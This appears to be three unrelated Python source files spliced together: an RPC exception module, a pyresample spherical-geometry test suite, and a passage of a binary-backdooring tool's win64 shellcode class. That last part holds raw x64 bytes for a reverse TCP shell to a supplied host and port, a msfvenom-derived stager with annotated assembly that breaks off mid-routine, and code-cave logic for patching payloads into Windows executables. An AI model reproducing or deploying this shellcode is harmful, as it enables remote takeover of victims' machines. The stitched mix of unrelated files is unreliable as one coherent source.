""" Produce a clone of the Exception on the remtoe end of the Route.
remoteClone is a general interface which allows local objects to be
re-created on the remote side. It takes no parameters and returns
a RemoteEval object from the `share' module which can then be
applied to a Route.
"""
cls = type(self)
args = self.remoteCloneArgs()
return RemoteEval(cls.teIFace, args, {})
def serializeConstructor(self, connection, outStream):
iface = type(self).teIFace
TransverseID.serialize(iface.transverseID, outStream)
args = self.remoteCloneArgs()
iface.serializeArguments(connection, args, outStream)
def remoteCloneArgs(self):
""" Get the arguments for remoteClone.
TransverseExceptions use `teImplements' rather than `implements'.
This sets the Interface to remote clone on the remote side of
the Route. The other part of the remote clone needed is the set
of arguments for the Interface constructor. This private function
is used to provide them. Default is no arguments.
"""
return ()
def teImplements(iface):
""" Use for TransverseExceptions in place of `implements'
This wrapper functions in the same way as the basic `implements' with
the additional behaviour of setting the cls.teIFace property to the
constructor call interface so that the Exception can be remote cloned.
All TransverseExceptions must be remote cloneable.
"""
def inner(cls):
cls.teIFace = iface.getCallInterface()
return implements(iface)(cls)
return inner
class TransverseExceptionInterface(TransverseObjectInterface):
""" Base interface for exception interfaces.
All defined exception interfaces should inherit from this (blank)
template.
"""
class UnknownErrorInterface(TransverseExceptionInterface):
""" Interface for UnknownError
"""
def __constructor__():
pass
@teImplements(UnknownErrorInterface)
class UnknownError(TransverseException):
""" A fall-back error to raise when something has gone wrong but the local side doesn't
want the remote side to know what happened. Used for applications that don't want to
leak information to potential attackers.
"""
class ErrorUnsupportedInterface(TransverseExceptionInterface):
""" Interface for ErrorUnsupported
"""
def __constructor__(errorID: TransverseID):
pass
@teImplements(ErrorUnsupportedInterface)
class ErrorUnsupported(TransverseException):
def __init__(self, errorID):
self.errorID = errorID
def remoteCloneArgs(self):
return self.errorID,
class SerializedErrorInterface(TransverseExceptionInterface):
""" Interface for SerializedError.
"""
def __constructor__(string:UnicodeString):
pass
@teImplements(SerializedErrorInterface)
class SerializedError(TransverseException):
""" An error useful for debugging. Converts the object in question (intended to be a language
exception) into a string and sends it down the wire.
"""
def __init__(self, thing):
self.string = repr(thing)
def remoteCloneArgs(self):
return self.string,
class UnknownMessageIDErrorInterface(TransverseExceptionInterface):
""" Interface for UnknownMessageIDError.
"""
def __constructor__(messageID:MessageID):
pass
@teImplements(UnknownMessageIDErrorInterface)
class UnknownMessageIDError(TransverseException):
""" This error is raised when an incoming reply or error, supposedly associated with an
outgoing message, does not match any outgoing message waiting to be serviced on the
local end of the route.
"""
def __init__(self, messageID):
self.messageID = messageID
def remoteCloneArgs(self):
return self.messageID,
class UnknownTransverseIDErrorInterface(TransverseExceptionInterface):
""" Interface for UnknownTransverseIDError.
"""
def __constructor__(tranverseID:TransverseID):
pass
@teImplements(UnknownTransverseIDErrorInterface)
class UnknownTransverseIDError(TransverseException):
""" This error is raised when an incoming tranverse resolution request, or an immediate
transverse reference within another message, requests a transverse ID that is not
exposed on the local side.
"""
def __init__(self, transverseID):
self.transverseID = transverseID
def remoteCloneArgs(self):
return self.transverseID,
class UnknownObjectIDErrorInterface(TransverseExceptionInterface):
""" Interface for UnknownObjectIDError.
"""
def __constructor__(objectID:SerialID):
pass
@teImplements(UnknownObjectIDErrorInterface)
class UnknownObjectIDError(TransverseException):
""" This error is raised when an incoming message includes a reference where the reference
is local but the reference number does not match a local object that has been shared
across the router.
"""
def __init__(self, objectID):
self.objectID = objectID
def remoteCloneArgs(self):
return self.objectID,
class BasicErrorService(Service):
ErrorUnsupported = ErrorUnsupportedInterface
UnknownError = UnknownErrorInterface
SerializedError = SerializedErrorInterface
UnknownMessageIDError = UnknownMessageIDErrorInterface
UnknownTransverseIDError = UnknownTransverseIDErrorInterface
UnknownObjectIDError = UnknownObjectIDErrorInterface
basicErrorService = BasicErrorService.implementation(
ErrorUnsupported = ErrorUnsupported,
UnknownError = UnknownError,
SerializedError = SerializedError,
UnknownMessageIDError = UnknownMessageIDError,
UnknownTransverseIDError = UnknownTransverseIDError,
UnknownObjectIDError = UnknownObjectIDError
)
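# A minimal sketch (hypothetical, not part of this service) of declaring a new
# remotely-cloneable error: define an interface whose __constructor__ lists the
# serializable arguments, decorate the exception with teImplements, and return
# those arguments from remoteCloneArgs so the other end of the Route can rebuild
# it.
#
#     class WidgetMissingErrorInterface(TransverseExceptionInterface):
#         def __constructor__(widgetID: SerialID):
#             pass
#
#     @teImplements(WidgetMissingErrorInterface)
#     class WidgetMissingError(TransverseException):
#         def __init__(self, widgetID):
#             self.widgetID = widgetID
#         def remoteCloneArgs(self):
#             return self.widgetID,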
|
import numpy as np
import unittest
import math
from pyresample.spherical_geometry import Coordinate, Arc
from pyresample import geometry
class TestOverlap(unittest.TestCase):
"""Testing overlapping functions in pyresample."""
def assert_raises(self, exception, call_able, *args):
"""Cover assertRaises from both py2.6 and 2.7+."""
import sys
if sys.version_info < (2, 7):
self.assertRaises(exception, call_able, *args)
else:
with self.assertRaises(exception):
call_able(*args)
def test_inside(self):
"""Testing if a point is inside an area."""
lons = np.array([[-11, 11], [-11, 11]])
lats = np.array([[11, 11], [-11, -11]])
area = geometry.SwathDefinition(lons, lats)
point = Coordinate(0, 0)
self.assertTrue(point in area)
point = Coordinate(0, 12)
self.assertFalse(point in area)
lons = np.array([[-179, 179], [-179, 179]])
lats = np.array([[1, 1], [-1, -1]])
area = geometry.SwathDefinition(lons, lats)
point = Coordinate(180, 0)
self.assertTrue(point in area)
point = Coordinate(180, 12)
self.assertFalse(point in area)
point = Coordinate(-180, 12)
self.assertFalse(point in area)
self.assert_raises(ValueError, Coordinate, 0, 192)
self.assert_raises(ValueError, Coordinate, 15, -91)
# case of the north pole
lons = np.array([[0, 90], [-90, 180]])
lats = np.array([[89, 89], [89, 89]])
area = geometry.SwathDefinition(lons, lats)
point = Coordinate(90, 90)
self.assertTrue(point in area)
def test_overlaps(self):
"""Test if two areas overlap."""
lons1 = np.array([[0, 90], [-90, 180]])
lats1 = np.array([[89, 89], [89, 89]])
area1 = geometry.SwathDefinition(lons1, lats1)
lons2 = np.array([[45, 135], [-45, -135]])
lats2 = np.array([[89, 89], [89, 89]])
area2 = geometry.SwathDefinition(lons2, lats2)
self.assertTrue(area1.overlaps(area2))
self.assertTrue(area2.overlaps(area1))
lons1 = np.array([[0, 45], [135, 90]])
lats1 = np.array([[89, 89], [89, 89]])
area1 = geometry.SwathDefinition(lons1, lats1)
lons2 = np.array([[180, -135], [-45, -90]])
lats2 = np.array([[89, 89], [89, 89]])
area2 = geometry.SwathDefinition(lons2, lats2)
self.assertFalse(area1.overlaps(area2))
self.assertFalse(area2.overlaps(area1))
lons1 = np.array([[-1, 1], [-1, 1]])
lats1 = np.array([[1, 1], [-1, -1]])
area1 = geometry.SwathDefinition(lons1, lats1)
lons2 = np.array([[0, 2], [0, 2]])
lats2 = np.array([[0, 0], [2, 2]])
area2 = geometry.SwathDefinition(lons2, lats2)
self.assertTrue(area1.overlaps(area2))
self.assertTrue(area2.overlaps(area1))
lons1 = np.array([[-1, 0], [-1, 0]])
lats1 = np.array([[1, 2], [-1, 0]])
area1 = geometry.SwathDefinition(lons1, lats1)
lons2 = np.array([[1, 2], [1, 2]])
lats2 = np.array([[1, 2], [-1, 0]])
area2 = geometry.SwathDefinition(lons2, lats2)
self.assertFalse(area1.overlaps(area2))
self.assertFalse(area2.overlaps(area1))
def test_overlap_rate(self):
"""Test how much two areas overlap."""
lons1 = np.array([[-1, 1], [-1, 1]])
lats1 = np.array([[1, 1], [-1, -1]])
area1 = geometry.SwathDefinition(lons1, lats1)
lons2 = np.array([[0, 2], [0, 2]])
lats2 = np.array([[0, 0], [2, 2]])
area2 = geometry.SwathDefinition(lons2, lats2)
self.assertAlmostEqual(area1.overlap_rate(area2), 0.25, 3)
self.assertAlmostEqual(area2.overlap_rate(area1), 0.25, 3)
lons1 = np.array([[82.829699999999974, 36.888300000000001],
[98.145499999999984, 2.8773]])
lats1 = np.array([[60.5944, 52.859999999999999],
[80.395899999999997, 66.7547]])
area1 = geometry.SwathDefinition(lons1, lats1)
lons2 = np.array([[7.8098183315148422, 26.189349044600252],
[7.8098183315148422, 26.189349044600252]])
lats2 = np.array([[62.953206630716465, 62.953206630716465],
[53.301561187195546, 53.301561187195546]])
area2 = geometry.SwathDefinition(lons2, lats2)
self.assertAlmostEqual(area1.overlap_rate(area2), 0.07, 2)
self.assertAlmostEqual(area2.overlap_rate(area1), 0.012, 3)
lons1 = np.array([[82.829699999999974, 36.888300000000001],
[98.145499999999984, 2.8773]])
lats1 = np.array([[60.5944, 52.859999999999999],
[80.395899999999997, 66.7547]])
area1 = geometry.SwathDefinition(lons1, lats1)
lons2 = np.array([[12.108984194981202, 30.490647126520301],
[12.108984194981202, 30.490647126520301]])
lats2 = np.array([[65.98228561983025, 65.98228561983025],
[57.304862819933433, 57.304862819933433]])
area2 = geometry.SwathDefinition(lons2, lats2)
self.assertAlmostEqual(area1.overlap_rate(area2), 0.509, 2)
self.assertAlmostEqual(area2.overlap_rate(area1), 0.0685, 3)
class TestSphereGeometry(unittest.TestCase):
"""Testing sphere geometry from this module."""
def test_angle(self):
"""Testing the angle value between two arcs."""
base = 0
p0_ = Coordinate(base, base)
p1_ = Coordinate(base, base + 1)
p2_ = Coordinate(base + 1, base)
p3_ = Coordinate(base, base - 1)
p4_ = Coordinate(base - 1, base)
arc1 = Arc(p0_, p1_)
arc2 = Arc(p0_, p2_)
arc3 = Arc(p0_, p3_)
arc4 = Arc(p0_, p4_)
self.assertAlmostEqual(arc1.angle(arc2), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc2.angle(arc3), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc3.angle(arc4), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc4.angle(arc1), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc1.angle(arc4), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc4.angle(arc3), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc3.angle(arc2), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc2.angle(arc1), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc1.angle(arc3), math.pi,
msg="this should be pi")
self.assertAlmostEqual(arc3.angle(arc1), math.pi,
msg="this should be pi")
self.assertAlmostEqual(arc2.angle(arc4), math.pi,
msg="this should be pi")
self.assertAlmostEqual(arc4.angle(arc2), math.pi,
msg="this should be pi")
p5_ = Coordinate(base + 1, base + 1)
p6_ = Coordinate(base + 1, base - 1)
p7_ = Coordinate(base - 1, base - 1)
p8_ = Coordinate(base - 1, base + 1)
arc5 = Arc(p0_, p5_)
arc6 = Arc(p0_, p6_)
arc7 = Arc(p0_, p7_)
arc8 = Arc(p0_, p8_)
self.assertAlmostEqual(arc1.angle(arc5), math.pi / 4, 3,
msg="this should be pi/4")
self.assertAlmostEqual(arc5.angle(arc2), math.pi / 4, 3,
msg="this should be pi/4")
self.assertAlmostEqual(arc2.angle(arc6), math.pi / 4, 3,
msg="this should be pi/4")
self.assertAlmostEqual(arc6.angle(arc3), math.pi / 4, 3,
msg="this should be pi/4")
self.assertAlmostEqual(arc3.angle(arc7), math.pi / 4, 3,
msg="this should be pi/4")
self.assertAlmostEqual(arc7.angle(arc4), math.pi / 4, 3,
msg="this should be pi/4")
self.assertAlmostEqual(arc4.angle(arc8), math.pi / 4, 3,
msg="this should be pi/4")
self.assertAlmostEqual(arc8.angle(arc1), math.pi / 4, 3,
msg="this should be pi/4")
self.assertAlmostEqual(arc1.angle(arc6), 3 * math.pi / 4, 3,
msg="this should be 3pi/4")
c0_ = Coordinate(180, 0)
c1_ = Coordinate(180, 1)
c2_ = Coordinate(-179, 0)
c3_ = Coordinate(-180, -1)
c4_ = Coordinate(179, 0)
arc1 = Arc(c0_, c1_)
arc2 = Arc(c0_, c2_)
arc3 = Arc(c0_, c3_)
arc4 = Arc(c0_, c4_)
self.assertAlmostEqual(arc1.angle(arc2), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc2.angle(arc3), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc3.angle(arc4), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc4.angle(arc1), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc1.angle(arc4), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc4.angle(arc3), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc3.angle(arc2), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc2.angle(arc1), -math.pi / 2,
msg="this should be -pi/2")
# case of the north pole
c0_ = Coordinate(0, 90)
c1_ = Coordinate(0, 89)
c2_ = Coordinate(-90, 89)
c3_ = Coordinate(180, 89)
c4_ = Coordinate(90, 89)
arc1 = Arc(c0_, c1_)
arc2 = Arc(c0_, c2_)
arc3 = Arc(c0_, c3_)
arc4 = Arc(c0_, c4_)
self.assertAlmostEqual(arc1.angle(arc2), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc2.angle(arc3), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc3.angle(arc4), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc4.angle(arc1), math.pi / 2,
msg="this should be pi/2")
self.assertAlmostEqual(arc1.angle(arc4), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc4.angle(arc3), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc3.angle(arc2), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(arc2.angle(arc1), -math.pi / 2,
msg="this should be -pi/2")
self.assertAlmostEqual(Arc(c1_, c2_).angle(arc1), math.pi / 4, 3,
msg="this should be pi/4")
self.assertAlmostEqual(Arc(c4_, c3_).angle(arc4), -math.pi / 4, 3,
msg="this should be -pi/4")
self.assertAlmostEqual(Arc(c1_, c4_).angle(arc1), -math.pi / 4, 3,
msg="this should be -pi/4")
def test_intersects(self):
"""Test if two arcs intersect."""
p0_ = Coordinate(0, 0)
p1_ = Coordinate(0, 1)
p2_ = Coordinate(1, 0)
p3_ = Coordinate(0, -1)
p4_ = Coordinate(-1, 0)
p5_ = Coordinate(1, 1)
p6_ = Coordinate(1, -1)
arc13 = Arc(p1_, p3_)
arc24 = Arc(p2_, p4_)
arc32 = Arc(p3_, p2_)
arc41 = Arc(p4_, p1_)
arc40 = Arc(p4_, p0_)
arc56 = Arc(p5_, p6_)
arc45 = Arc(p4_, p5_)
arc02 = Arc(p0_, p2_)
arc35 = Arc(p3_, p5_)
self.assertTrue(arc13.intersects(arc24))
self.assertFalse(arc32.intersects(arc41))
self.assertFalse(arc56.intersects(arc40))
self.assertFalse(arc56.intersects(arc40))
self.assertFalse(arc45.intersects(arc02))
self.assertTrue(arc35.intersects(arc24))
p0_ = Coordinate(180, 0)
p1_ = Coordinate(180, 1)
p2_ = Coordinate(-179, 0)
p3_ = Coordinate(-180, -1)
p4_ = Coordinate(179, 0)
p5_ = Coordinate(-179, 1)
p6_ = Coordinate(-179, -1)
arc13 = Arc(p1_, p3_)
arc24 = Arc(p2_, p4_)
arc32 = Arc(p3_, p2_)
arc41 = Arc(p4_, p1_)
arc40 = Arc(p4_, p0_)
arc56 = Arc(p5_, p6_)
arc45 = Arc(p4_, p5_)
arc02 = Arc(p0_, p2_)
arc35 = Arc(p3_, p5_)
self.assertTrue(arc13.intersects(arc24))
self.assertFalse(arc32.intersects(arc41))
self.assertFalse(arc56.intersects(arc40))
self.assertFalse(arc56.intersects(arc40))
self.assertFalse(arc45.intersects(arc02))
self.assertTrue(arc35.intersects(arc24))
# case of the north pole
p0_ = Coordinate(0, 90)
p1_ = Coordinate(0, 89)
p2_ = Coordinate(90, 89)
p3_ = Coordinate(180, 89)
p4_ = Coordinate(-90, 89)
p5_ = Coordinate(45, 89)
p6_ = Coordinate(135, 89)
arc13 = Arc(p1_, p3_)
arc24 = Arc(p2_, p4_)
arc32 = Arc(p3_, p2_)
arc41 = Arc(p4_, p1_)
arc40 = Arc(p4_, p0_)
arc56 = Arc(p5_, p6_)
arc45 = Arc(p4_, p5_)
arc02 = Arc(p0_, p2_)
arc35 = Arc(p3_, p5_)
self.assertTrue(arc13.intersects(arc24))
self.assertFalse(arc32.intersects(arc41))
self.assertFalse(arc56.intersects(arc40))
self.assertFalse(arc56.intersects(arc40))
self.assertFalse(arc45.intersects(arc02))
self.assertTrue(arc35.intersects(arc24))
|
''''
Copyright (c) 2013-2014, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
##########################################################
# BEGIN win64 shellcodes #
##########################################################
import struct
import sys
from intelmodules import eat_code_caves
class winI64_shellcode():
"""
Windows Intel x64 shellcode class
"""
def __init__(self, HOST, PORT, SUPPLIED_SHELLCODE):
self.HOST = HOST
self.PORT = PORT
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.shellcode = ""
self.stackpreserve = ("\x90\x90\x50\x53\x51\x52\x56\x57\x54\x55\x41\x50"
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
)
self.stackrestore = ("\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
"\x41\x58\x5d\x5c\x5f\x5e\x5a\x59\x5b\x58"
)
def pack_ip_addresses(self):
hostocts = []
if self.HOST is None:
print "This shellcode requires a HOST parameter -H"
sys.exit(1)
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
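# For illustration (hypothetical host): with HOST "192.168.1.10" the loop above
# packs each octet into one byte, so self.hostip == "\xc0\xa8\x01\x0a", ready to
# be spliced into the sockaddr portion of the shellcode.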
def returnshellcode(self):
return self.shellcode
def reverse_shell_tcp(self, flItms, CavesPicked={}):
"""
Modified metasploit windows/x64/shell_reverse_tcp
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ("\xfc"
"\x48\x83\xe4\xf0"
"\xe8")
if flItms['cave_jumping'] is True:
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar -
len(self.stackpreserve) - len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xc0\x00\x00\x00"
self.shellcode1 += ("\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff")
self.shellcode2 = ("\x5d\x49\xbe\x77\x73\x32\x5f\x33"
"\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
"\x49\x89\xe5\x49\xbc\x02\x00")
self.shellcode2 += struct.pack('!h', self.PORT)
self.shellcode2 += self.pack_ip_addresses()
self.shellcode2 += ("\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
"\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x90\x90\x90\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda"
"\x48\x81\xc4\xf8\x00\x00\x00" # Add RSP X ; align stack
)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def cave_miner(self, flItms, CavesPicked={}):
"""
Sample code for finding suitable code caves
"""
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ""
if flItms['cave_jumping'] is True:
if breakupvar > 0:
self.shellcode1 += "\xe9"
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar -
len(self.stackpreserve) - len(self.shellcode1) - 3)
#else:
# self.shellcode1 += "\xc0\x00\x00\x00"
self.shellcode1 += ("\x90" * 13)
self.shellcode2 = ("\x90" * 19)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
def reverse_tcp_stager(self, flItms, CavesPicked={}):
"""
Ported the x32 payload from msfvenom for patching win32 binaries (shellcode1)
with the help of Steven Fewer's work on msf win64 payloads.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
flItms['stager'] = True
#overloading the class stackpreserve
self.stackpreserve = ("\x90\x50\x53\x51\x52\x56\x57\x55\x41\x50"
"\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
)
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ("\x90" # <--THAT'S A NOP. \o/
"\xe8\xc0\x00\x00\x00" # jmp to allocate
#api_call
"\x41\x51" # push r9
"\x41\x50" # push r8
"\x52" # push rdx
"\x51" # push rcx
"\x56" # push rsi
"\x48\x31\xD2" # xor rdx,rdx
"\x65\x48\x8B\x52\x60" # mov rdx,qword ptr gs:[rdx+96]
"\x48\x8B\x52\x18" # mov rdx,qword ptr [rdx+24]
"\x48\x8B\x52\x20" # mov rdx,qword ptr[rdx+32]
#next_mod
"\x48\x8b\x72\x50" # mov rsi,[rdx+80]
"\x48\x0f\xb7\x4a\x4a" # movzx rcx,word [rdx+74]
"\x4d\x31\xc9" # xor r9,r9
#loop_modname
"\x48\x31\xc0" # xor rax,rax
"\xac" # lods
"\x3c\x61" # cmp al, 61h (a)
"\x7c\x02" # jl 02
"\x2c\x20" # sub al, 0x20
#not_lowercase
"\x41\xc1\xc9\x0d" # ror r9d, 13
"\x41\x01\xc1" # add r9d, eax
"\xe2\xed" # loop until read, back to xor rax, rax
"\x52" # push rdx ; Save the current position in the module list for later
"\x41\x51" # push r9 ; Save the current module hash for later
                                           # ; Proceed to iterate the export address table,
"\x48\x8b\x52\x20" # mov rdx, [rdx+32] ; Get this modules base address
"\x8b\x42\x3c" # mov eax, dword [rdx+60] ; Get PE header
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address
"\x8b\x80\x88\x00\x00\x00" # mov eax, dword [rax+136] ; Get export tables RVA
"\x48\x85\xc0" # test rax, rax ; Test if no export address table is present
"\x74\x67" # je get_next_mod1 ; If no EAT present, process the next module
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address
"\x50" # push rax ; Save the current modules EAT
"\x8b\x48\x18" # mov ecx, dword [rax+24] ; Get the number of function names
"\x44\x8b\x40\x20" # mov r8d, dword [rax+32] ; Get the rva of the function names
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
# ; Computing the module hash + function hash
#get_next_func: ;
"\xe3\x56" # jrcxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
"\x48\xff\xc9" # dec rcx ; Decrement the function name counter
"\x41\x8b\x34\x88" # mov esi, dword [r8+rcx*4]; Get rva of next module name
"\x48\x01\xd6" # add rsi, rdx ; Add the modules base address
"\x4d\x31\xc9" # xor r9, r9 ; Clear r9 which will store the hash of the function name
                                           # ; And compare it to the one we want
#loop_funcname: ;
"\x48\x31\xc0" # xor rax, rax ; Clear rax
"\xac" # lodsb ; Read in the next byte of the ASCII function name
"\x41\xc1\xc9\x0d" # ror r9d, 13 ; Rotate right our hash value
"\x41\x01\xc1" # add r9d, eax ; Add the next byte of the name
"\x38\xe0" # cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
"\x75\xf1" # jne loop_funcname ; If we have not reached the null terminator, continue
"\x4c\x03\x4c\x24\x08" # add r9, [rsp+8] ; Add the current module hash to the function hash
"\x45\x39\xd1" # cmp r9d, r10d ; Compare the hash to the one we are searchnig for
"\x75\xd8" # jnz get_next_func ; Go compute the next function hash if we have not found it
# ; If found, fix up stack, call the function and then value else compute the next one...
"\x58" # pop rax ; Restore the current modules EAT
"\x44\x8b\x40\x24" # mov r8d, dword [rax+36] ; Get the ordinal table rva
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
"\x66\x41\x8b\x0c\x48" # mov cx, [r8+2*rcx] ; Get the desired functions ordinal
"\x44\x8b\x40\x1c" # mov r8d, dword [rax+28] ; Get the function addresses table rva
"\x49\x01\xd0" # add r8, rdx ; Add the modules base address
"\x41\x8b\x04\x88" # mov eax, dword [r8+4*rcx]; Get the desired functions RVA
"\x48\x01\xd0" # add rax, rdx ; Add the modules base address to get the functions actual VA
                                           # ; We now fix up the stack and perform the call to the desired function...
#finish:
"\x41\x58" # pop r8 ; Clear off the current modules hash
"\x41\x58" # pop r8 ; Clear off the current position in the module list
"\x5E" # pop rsi ; Restore RSI
"\x59" # pop rcx ; Restore the 1st parameter
"\x5A" # pop rdx ; Restore the 2nd parameter
"\x41\x58" # pop r8 ; Restore the 3rd parameter
"\x41\x59" # pop r9 ; Restore the 4th parameter
"\x41\x5A" # pop r10 ; pop off the return address
"\x48\x83\xEC\x20" # sub rsp, 32 ; reserve space for the four register params (4 * sizeof(QWORD) = 32)
# ; It is the callers responsibility to restore RSP if need be (or alloc more space or align RSP).
"\x41\x52" # push r10 ; push back the return address
"\xFF\xE0" # jmp rax ; Jump into the required function
# ; We now automagically return to the correct caller...
# get_next_mod:
